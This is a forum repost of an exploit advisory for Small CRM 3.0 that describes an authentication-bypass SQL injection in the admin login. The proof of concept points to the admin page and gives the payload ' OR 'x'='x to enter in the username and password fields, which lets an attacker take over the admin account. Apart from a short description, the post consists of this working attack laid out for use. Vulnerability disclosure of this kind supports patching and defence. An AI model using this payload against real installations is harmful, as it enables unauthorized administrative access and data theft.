跳转到帖子

Small CRM 3.0 - 'Authentication Bypass' SQL Injection

recommended_posts

发布于
  • Members
# Exploit Title: Small CRM 3.0 - 'Authentication Bypass' SQL Injection
# Date: 12/06/2021
# Exploit Author: BHAVESH KAUL
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/small-crm-php/
# Version: 3.0
# Tested on: Server: XAMPP

# Description #

Small CRM 3.0 is vulnerable to SQL Injection on it's admin login because of insufficient user supplied data sanitization and the sql injection payload being executed. Attacker is able to access the admin login panel and supply the malicious payload, successfully taking over admin account.

# Proof of Concept (PoC) : Exploit #

1) Goto: http://localhost/crm/admin/

2) Enter the following payload in 'Username' and 'Password' parameter: ' OR 'x'='x

3) SQL Injection successfull
            
  • 查看数 697
  • 已创建
  • 最后回复

参与讨论

你可立刻发布并稍后注册。 如果你有帐户,立刻登录发布帖子。

游客
回帖…